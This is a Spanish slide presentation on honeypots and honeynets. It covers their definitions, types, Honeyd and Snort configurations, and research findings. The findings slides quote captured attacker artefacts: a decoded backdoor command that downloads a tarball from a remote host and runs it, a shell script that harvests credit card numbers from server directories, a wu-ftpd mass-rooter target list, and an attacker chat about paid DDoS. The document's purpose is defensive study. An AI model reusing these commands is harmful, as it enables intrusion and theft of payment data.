Tarros de miel y redes trampa El Ponente

  • Slides: 59
Download presentation
Tarros de miel y redes trampa

Tarros de miel y redes trampa

El Ponente z. Consultor de Seguridad en Germinus z. Miembro del grupo HIS z.

El Ponente z. Consultor de Seguridad en Germinus z. Miembro del grupo HIS z. Desarrollador de software libre y. Miembro del proyecto Debian y. Autor del Manual de Seguridad de Debian y. Desarrollador principal de Tiger y. Colaborador en el desarrollo de Bastille y Nessus (entre otros)

Propósito Mostrar qué son los tarros de miel y las redes trampa, para qué

Propósito Mostrar qué son los tarros de miel y las redes trampa, para qué sirven y qué aportan a la ingeniería de seguridad.

Resumen z. El problema z. Definición y tipos de los tarros de miel z.

Resumen z. El problema z. Definición y tipos de los tarros de miel z. Introducción a las redes trampa z. Ejemplos de redes trampa z. Descubrimientos z. Recursos

El problema

El problema

El problema z. Las organizaciones son objetivos estáticos, no se “mueve” y todo el

El problema z. Las organizaciones son objetivos estáticos, no se “mueve” y todo el mundo sabe dónde están. z. Los “malos” tienen la iniciativa. Tienen recursos ilimitados y pueden atacarte cuando quieran, como quieran.

Solución Tradicional z. Proteger su red lo mejor que pueda. z. Esperar y desear

Solución Tradicional z. Proteger su red lo mejor que pueda. z. Esperar y desear que detecte cuando se produce un fallo.

Iniciativa Los tarros de miel y las redes trampa pueden dar la iniciativa.

Iniciativa Los tarros de miel y las redes trampa pueden dar la iniciativa.

Motivos e intenciones J 4 ck: why don't you start charging for packet attacks?

Motivos e intenciones J 4 ck: why don't you start charging for packet attacks? J 4 ck: "give me x amount and I'll take bla offline for this amount of time” J 1 LL: it was illegal last I checked J 4 ck: heh, then everything you do is illegal. Why not make money off of it? J 4 ck: I know plenty of people that'd pay exorbatent amounts for packeting

Descubrimiento de nuevas herramientas

Descubrimiento de nuevas herramientas

Definición de los tarros de miel (o PED)

Definición de los tarros de miel (o PED)

Historia z 1990 y. The Cuckoo’s Egg y. Una noche con Berferd z 1997

Historia z 1990 y. The Cuckoo’s Egg y. Una noche con Berferd z 1997 z 1998 z 1999 z 2001 - Deception Toolkit Net. Facade y Cyber. Cop Sting El proyecto Honeynet Capturas de gusanos

Definición Recursos de seguridad cuyo valor reside en ser sondeados, atacados o comprometidos.

Definición Recursos de seguridad cuyo valor reside en ser sondeados, atacados o comprometidos.

Concepto z. Recursos que no tienen servicios en producción ni uso autorizado. z. Lo

Concepto z. Recursos que no tienen servicios en producción ni uso autorizado. z. Lo más probable es que cualquier conexión sea una sonda o un ataque, cualquier uso es no autorizado.

Una herramienta, no una solución z. Los tarros de miel son muy flexibles, son

Una herramienta, no una solución z. Los tarros de miel son muy flexibles, son de muchas formas y tamaños. z. No se diseñan para un problema específico. z. Puede utilizarse para distintos propósitos.

Ventajas z. Información valiosa z. Número reducido de falsos positivos z. Número reducido de

Ventajas z. Información valiosa z. Número reducido de falsos positivos z. Número reducido de falsos negativos z. Concepto simple z. No exige muchos recursos z. Retorno de la inversión

Desventajas z. Riesgo z. Punto de vista limitado z. No protege sistemas vulnerables

Desventajas z. Riesgo z. Punto de vista limitado z. No protege sistemas vulnerables

Tipos de tarros de miel z. Producción y. Incrementa la seguridad en su red:

Tipos de tarros de miel z. Producción y. Incrementa la seguridad en su red: protección, detección y respuesta z. Investigación y. Utilizada para recoger información y. Alerta temprana y predicción de ataques

Nivel de interacción z. Los objetivos de los tarros de miel son distintos. z.

Nivel de interacción z. Los objetivos de los tarros de miel son distintos. z. La funcionalidad depende de sus objetivos. Cuanto más pueda hacer un atacante en un tarro de miel, mayor es el nivel de interacción.

Nivel de interacción. z A mayor interacción más se puede conocer sobre el atacante.

Nivel de interacción. z A mayor interacción más se puede conocer sobre el atacante. z Cuanto mayor la interacción, mayor el riesgo. z Los tarros de miel de producción suelen tener baja interacción mientras que las de investigación tienen alta interacción.

Niveles z. Bajo – Emula servicios. Ejemplos: Back. Officer Friendly o Honeyd. z. Medio

Niveles z. Bajo – Emula servicios. Ejemplos: Back. Officer Friendly o Honeyd. z. Medio – Acceso limitado a un sistema operativo controlado. Ejemplo: entorno chroot o de jaula. z. Alto – Acceso a un sistema operativo totalmente funcional. Ejemplo: Man. Trap o las redes trampa.

¿Cual es mejor? ¡Ninguno! Tienen todas ventajas y desventajas. Depende en lo que se

¿Cual es mejor? ¡Ninguno! Tienen todas ventajas y desventajas. Depende en lo que se quiera conseguir.

Baja interacción z. Emula vulnerabilidades: Un atacante está limitado a interactuar con los servicios

Baja interacción z. Emula vulnerabilidades: Un atacante está limitado a interactuar con los servicios que se ofrezcan, y el nivel de funcionalidad que se le de a éstos. y. Utilizado fundamentalmente para detectar o confundir. y. Captura de información limitada.

Emulación de servidor de FTP case $incmd_nocase in QUIT* ) echo -e "221 Goodbye.

Emulación de servidor de FTP case $incmd_nocase in QUIT* ) echo -e "221 Goodbye. r" exit 0; ; SYST* ) echo -e "215 UNIX Type: L 8r" ; ; HELP* ) echo -e "214 -The following commands are recognized (* =>'s unimplemented). r" echo -e " USER PORT STOR MSAM* RNTO NLST MKD CDUPr" echo -e " PASS PASV APPE MRSQ* ABOR SITE XMKD XCUPr" echo -e " ACCT* TYPE MLFL* MRCP* DELE SYST RMD STOUr" echo -e " SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZEr" echo -e " REIN* MODE MSND* REST XCWD HELP PWD MDTMr" echo -e " QUIT RETR MSOM* RNFR LIST NOOP XPWDr" echo -e "214 Direct comments to ftp@$domain. r" ; ; USER* ) parm 1_nocase=`echo $parm 1 | gawk '{print toupper($0); }'` if [ "$parm 1_nocase" == "ANONYMOUS" ] then echo -e "331 Guest login ok, send your complete e-mail address as a password. r" AUTH="ANONYMOUS" else echo -e "331 Password required for $parm 1r" AUTH=$parm 1 fi ; ;

Alta interacción z. Ofrece un sistema operativo completo para que el atacante interactúe con

Alta interacción z. Ofrece un sistema operativo completo para que el atacante interactúe con él. y. Usado principalmente para investigación y respuesta, pero también puede ser utilizado para prevención y detección. y. Complejas de desplegar, pero potencialmente más seguro que las jaulas y. Captura gran cantidad de información. y. NO emula

Valor de redes trampa de producción z. Protección z. Detección z. Respuesta

Valor de redes trampa de producción z. Protección z. Detección z. Respuesta

Valor de redes trampa de investigación z. Recogida de inteligencia z. Predicción y Alerta

Valor de redes trampa de investigación z. Recogida de inteligencia z. Predicción y Alerta Temprana

Ejemplos

Ejemplos

Redes Trampa de producción z. Back. Officer Friendly z. La. Brea Tarpit z. Deception

Redes Trampa de producción z. Back. Officer Friendly z. La. Brea Tarpit z. Deception Toolkit z. Smoke Detector z. Specter z. Honeyd

Specter

Specter

Honeyd. conf create default set default personality "Free. BSD 2. 2. 1 -STABLE" set

Honeyd. conf create default set default personality "Free. BSD 2. 2. 1 -STABLE" set default tcp action reset add default tcp port 80 "sh /etc/Honeyd/scripts/web. sh" add default tcp port 22 "sh /etc/Honeyd/scripts/test. sh" add default tcp port 113 open add default tcp port 1 reset create windows set windows personality "Windows NT 4. 0 Server SP 5 -SP 6" set windows default tcp action reset add windows tcp port 80 ”perl /etc/Honeyd/scripts/iis/main. pl" add windows tcp port 25 block add windows tcp port 23 proxy real-server. tracking-hackers. com: 23 add windows tcp port 22 proxy $ipsrc: 22 set windows uptime 3284460 bind 192. 168. 1. 200 windows

Nmap. prints # Contributed by Vilius beneti@sc. ktu. lt Fingerprint Windows NT 4. 0

Nmap. prints # Contributed by Vilius beneti@sc. ktu. lt Fingerprint Windows NT 4. 0 Server SP 5 -SP 6 TSeq(Class=RI%gcd=<8%SI=<11784 E&>2 CA 4) T 1(DF=Y%W=2017%ACK=S++%Flags=AS%Ops=MNWNNT) T 2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) T 3(Resp=Y%DF=Y%W=2017%ACK=O%Flags=A%Ops=NNT) T 4(DF=N%W=0%ACK=O%Flags=R%Ops=) T 5(DF=N%W=0%ACK=S++%Flags=AR%Ops=) T 6(DF=N%W=0%ACK=O%Flags=R%Ops=) T 7(DF=N%W=0%ACK=S++%Flags=AR%Ops=) PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%ULEN= 134%DAT=E)

¿Un router Cisco?

¿Un router Cisco?

Tarros de miel de investigación z. Man. Trap z. Redes trampa

Tarros de miel de investigación z. Man. Trap z. Redes trampa

Man. Trap Sistema Operativo Host Jaula 1 Jaula 2 Jaula 3 Jaula 4

Man. Trap Sistema Operativo Host Jaula 1 Jaula 2 Jaula 3 Jaula 4

Repetición de sesión

Repetición de sesión

Red Trampa (Honeynet) z. Tarro de miel Open. Source. z. Se trata de una

Red Trampa (Honeynet) z. Tarro de miel Open. Source. z. Se trata de una arquitectura, no es ni un producto ni ningún software concreto. z. Poblada de sistemas “vivos”.

Gen. II Honeynet

Gen. II Honeynet

Control de Datos - Gen. II alert tcp $HONEYNET any -> any 53 (msg:

Control de Datos - Gen. II alert tcp $HONEYNET any -> any 53 (msg: "DNS EXPLOIT named"; flags: A+; content: "|CD 80 E 8 D 7 FFFFFF|/bin/sh"; replace: "|0000 E 8 D 7 FFFFFF|/ben/sh"; ) http: //www. snort. org

Redes trampas virtuales

Redes trampas virtuales

Desplegando tarros de miel

Desplegando tarros de miel

Tarros de miel distribuidos

Tarros de miel distribuidos

Tarros de miel wireless

Tarros de miel wireless

Descubrimientos

Descubrimientos

El proyecto Honeynet z. Una organización de voluntarios dedicados a la investigación de riesgos

El proyecto Honeynet z. Una organización de voluntarios dedicados a la investigación de riesgos cibernéticos. z. Desplegando redes a lo largo del planeta para que sean atacadas

¿Quién soy yo?

¿Quién soy yo?

Mass-rooter 1 2 3 4 5 6 7 8 9 10 11 12 13

Mass-rooter 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | | | | | | | | | Caldera e. Desktop|Open. Linux 2. 3 update[wu-ftpd-2. 6. 1 -13 OL. i 386. rpm] Debian potato [wu-ftpd_2. 6. 0 -3. deb] Debian potato [wu-ftpd_2. 6. 0 -5. 1. deb] Debian potato [wu-ftpd_2. 6. 0 -5. 3. deb] Debian sid [wu-ftpd_2. 6. 1 -5_i 386. deb] Immunix 6. 2 (Cartman) [wu-ftpd-2. 6. 0 -3_Stack. Guard. rpm] Immunix 7. 0 (Stolichnaya) [wu-ftpd-2. 6. 1 -6_imnx_2. rpm] Mandrake 6. 0|6. 1|7. 0|7. 1 update [wu-ftpd-2. 6. 1 -8. 6 mdk. i 586. rpm] Mandrake 7. 2 update [wu-ftpd-2. 6. 1 -8. 3 mdk. i 586. rpm] Mandrake 8. 1 [wu-ftpd-2. 6. 1 -11 mdk. i 586. rpm] Red. Hat 5. 0|5. 1 update [wu-ftpd-2. 4. 2 b 18 -2. 1. i 386. rpm] Red. Hat 5. 2 (Apollo) [wu-ftpd-2. 4. 2 b 18 -2. i 386. rpm] Red. Hat 5. 2 update [wu-ftpd-2. 6. 0 -2. 5. x. i 386. rpm] Red. Hat 6. ? [wu-ftpd-2. 6. 0 -1. i 386. rpm] Red. Hat 6. 0|6. 1|6. 2 update [wu-ftpd-2. 6. 0 -14. 6 x. i 386. rpm] Red. Hat 6. 1 (Cartman) [wu-ftpd-2. 5. 0 -9. rpm] Red. Hat 6. 2 (Zoot) [wu-ftpd-2. 6. 0 -3. i 386. rpm] Red. Hat 7. 0 (Guinness) [wu-ftpd-2. 6. 1 -6. i 386. rpm] Red. Hat 7. 1 (Seawolf) [wu-ftpd-2. 6. 1 -16. rpm] Red. Hat 7. 2 (Enigma) [wu-ftpd-2. 6. 1 -18. i 386. rpm] Su. SE 6. 0|6. 1 update [wuftpd-2. 6. 0 -151. i 386. rpm] Su. SE 6. 0|6. 1 update wu-2. 4. 2 [wuftpd-2. 6. 0 -151. i 386. rpm] Su. SE 6. 2 update [wu-ftpd-2. 6. 0 -1. i 386. rpm] Su. SE 6. 2 update [wuftpd-2. 6. 0 -121. i 386. rpm] Su. SE 6. 2 update wu-2. 4. 2 [wuftpd-2. 6. 0 -121. i 386. rpm] Su. SE 7. 0 [wuftpd. rpm] Su. SE 7. 0 wu-2. 4. 2 [wuftpd. rpm] Su. SE 7. 1 wu-2. 4. 2 [wuftpd. rpm] Su. SE 7. 2 wu-2. 4. 2 [wuftpd. rpm] Su. SE 7. 3 wu-2. 4. 2 [wuftpd. rpm]

Nuevas tácticas - puertas traseras 02/19 -04: 34: 10. 529350 206. 123. 208. 5

Nuevas tácticas - puertas traseras 02/19 -04: 34: 10. 529350 206. 123. 208. 5 -> 172. 16. 183. 2 PROTO 011 TTL: 237 TOS: 0 x 0 ID: 13784 Ip. Len: 20 Dgm. Len: 422 02 00 17 35 B 7 37 BA 3 D B 5 38 BB F 2 36 86 BD 48. . . 5. 7. =. 8. . 6. . H D 3 5 D D 9 62 EF 6 B A 2 F 4 2 B AE 3 E C 3 52 89 CD 57. ]. b. k. . +. >. R. . W DD 69 F 2 6 C E 8 1 F 8�E 29 B 4 3 B 8 C D 2 18 61 A 9 F 6. i. l. . . ). ; . . . a. . 3 B 84 CF 18 5 D A 5 EC 36 7 B C 4 15 64 B 3 02 4 B 91 ; . . . ]. . 6{. . d. . K. 0 E 94 1 A 51 A 6 DD 23 AE 32 B 8 FF 7 C 02 88 CD 58. . . Q. . #. 2. . |. . . X D 6 67 9 E F 0 27 A 1 1 C 53 99 24 A 8 2 F 66 B 8 EF 7 A. g. . '. . S. $. /f. . z F 2 7 B B 2 F 6 85 12 A 3 20 57 D 4 5 A E 0 25 B 0 2 E BF. {. . . W. Z. %. . . F 6 48 7 F C 4 0 A 95 20 AA 26 AF 3 C B 8 EF 41 78 01. H. . . &. <. . Ax. 85 BC 00 89 06 3 D BA 40 C 6 0 B 96 14 A 5 DC 67 F 2. . . =. @. . . g. 7 C F 8 81 0 E 8 A DC F 3 0 A 21 38 4 F 66 7 D 94 AB C 2 |. . . . !8 Of}. . . D 9 F 0 07 1 E 35 4 C 63 7 A 91 A 8 BF D 6 ED 04 1 B 32. . 5 Lcz. . . . 2 49 60 77 8 E A 5 BC D 3 EA 01 18 2 F 46 5 D 74 8 B A 2 I`w. . . . /F]t. . B 9 D 0 E 7 FE 15 2 C 43 5 A 71 88 9 F B 6 CD E 4 FB 12. . . , CZq. . . . 29 40 57 6 E 85 9 C B 3 CA E 1 F 8 0 F 26 3 D 54 6 B 82 )@Wn. . . . &=Tk. 99 B 0 C 7 DE F 5 0 C 23 3 A 51 68 7 F 96 AD C 4 DB F 2. . . #: Qh. . . 09 20 37 4 E 65 7 C 93 AA C 1 D 8 EF 06 1 D 34 4 B 62. 7 Ne|. . . . 4 Kb 79 90 A 7 BE D 5 EC 03 1 A 31 48 5 F 76 8 D A 4 BB D 2 y. . . . 1 H_v. . E 9 00 17 2 E 45 5 C 73 8 A A 1 B 8 CF E 6 FD 14 2 B 42. . Es. . . . +B 59 70 87 9 E B 5 CC E 3 FA 11 28 3 F 56 6 D 84 9 B B 2 Yp. . . . (? Vm. . . C 9 E 0 F 7 0 E 25 3 C 53 6 A 81 98 AF C 6 DD F 4 0 B 22. . %<Sj. . . . " 39 50 67 7 E 95 AC C 3 DA F 1 08 1 F 36 4 D 64 7 B 92 9 Pg~. . . . 6 Md{. A 9 C 0 D 7 EE 05 1 C 33 4 A 61 78 8 F A 6 BD D 4 EB 02. . . 3 Jax. . . 19 30 47 5 E 75 8 C A 3 BA D 1 E 8 FF 16 2 D 44 5 B 72. 0 G^u. . . . -D[r 89 A 0 B 7 CE E 5 FC 13 2 A 41 58 6 F 86 9 D B 4 CB E 2. . . . *AXo. . . F 9 10 27 3 E 55 6 C 83 9 A B 1 C 8 DF F 6 0 D 24 3 B 52. . '>Ul. . . . $; R 69 80 i.

Orden descifrada de la puerta trasera starting decode of packet size 420 17 35

Orden descifrada de la puerta trasera starting decode of packet size 420 17 35 B 7 37 BA 3 D B 5 38 BB F 2 36 86 local buf of size 420 00 07 6 B 69 6 C 6 C 61 6 C 6 C 20 2 D 39 65 72 76 65 20 3 B 20 6 C 79 6 E 78 20 72 63 65 20 68 74 74 70 3 A 2 F 2 F 31 36 38 2 E 31 30 33 2 E 32 3 A 38 38 38 6 F 20 3 E 20 2 F 74 6 D 70 2 F 66 6 F 6 F 20 3 B 20 63 64 20 2 F 74 6 D 70 20 3 B 20 2 D 78 76 7 A 66 20 66 6 F 6 F 2 E 74 20 2 E 2 F 74 74 73 65 72 76 65 20 3 B 2 D 72 66 20 66 6 F 6 F 2 E 74 67 7 A 20 72 76 65 3 B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B 1 91 00 83 6 A A 6 39 05 B 1 BF E 7 6 F C 5 FE 24 05 00 00 BD 48 D 3 5 D 20 2 D 39 32 2 E 20 67 20 74 00 00 00 00 BF 00 74 73 32 2 F 74 74 7 A 72 74 00 00 00 00 1 D 00 74 6 F 2 E 66 67 61 20 6 D 73 00 00 00 00 88 00 73 75 31 6 F 7 A 72 3 B 20 65 00 00 00 00 CB 00 . . killall -9 tts erve ; lynx -sou rce http: //192. 1 68. 103. 2: 8882/fo o > /tmp/foo. tgz ; cd /tmp ; tar -xvzf foo. tgz ; . /ttserve ; rm -rf foo. tgz ttse rve; . . . . . . . . . . . . . . . . j. 9. . o. . . $. . .

Motivos #!/bin/sh echo " Caut carti de credit si incerc sa salvez in card.

Motivos #!/bin/sh echo " Caut carti de credit si incerc sa salvez in card. log" touch /dev/ida/. inet/card. log egrep -ir 'mastercard|visa' /home|egrep -v cache >>card. log egrep -ir 'mastercard|visa' /var|egrep -v cache >>card. log egrep -ir 'mastercard|visa' /root|egrep -v cache >>card. log if [ -d /www ]; then egrep -ir 'mastercard|visa' /www >>card. log fi

Predicción y alerta temprana

Predicción y alerta temprana

Resumen z. Los tarros de miel y las redes trampa son un elemento de

Resumen z. Los tarros de miel y las redes trampa son un elemento de investigación interesante z. No sirven para proteger sistemas inseguros z. Pero son un nuevo elemento que ayuda a la investigación de problemas de seguridad y detección de ataques

Fuentes - Libros z Know Your Enemy yhttp: //www. honeynet. org/book/ z. Honeypots: Tracking

Fuentes - Libros z Know Your Enemy yhttp: //www. honeynet. org/book/ z. Honeypots: Tracking Hackers yhttp: //www. tracking-hackers. com/book/

Fuentes - Sitios Web zhttp: //www. tracking-hackers. com zhttp: //www. honeynet. org zhttp: //his.

Fuentes - Sitios Web zhttp: //www. tracking-hackers. com zhttp: //www. honeynet. org zhttp: //his. sourceforge. net zhttp: //www. nfr. net/products/bof zhttp: //www. citi. umich. edu/u/provos/honeyd/ zhttp: //www. all. net/dtk zhttp: //www. specter. com zhttp: //www. mantrap. com

Fuentes - Publicaciones z. Honeypots: Definitions and Values yhttp: //www. spitzner. net/honeypots. html z.

Fuentes - Publicaciones z. Honeypots: Definitions and Values yhttp: //www. spitzner. net/honeypots. html z. Honeynets yhttp: //www. honeynet. org/papers/honeynet/ z. Virtual Honeynets yhttp: //www. honeynet. org/papers/virtual/ Muchos traducidos en http: //his. sourceforge. net/honeynet/papers/

Recursos - Listas de correo z. Lista de correo de tarros de miel y

Recursos - Listas de correo z. Lista de correo de tarros de miel y http: //www. securityfocus. com/popups/forums/honeypots/faq. shtml z. Lista de correo Firewall Wizards yhttp: //www. nfr. net/mailman/listinfo/firewall-wizards z. Lista de correo proyecto HIS (en español) yhttps: //lists. sourceforge. net/lists/listinfo/his-discusion

Contacto <jfernandez@germinus. com> http: //his. sourceforge. net http: //www. tracking-hackers. com

Contacto <jfernandez@germinus. com> http: //his. sourceforge. net http: //www. tracking-hackers. com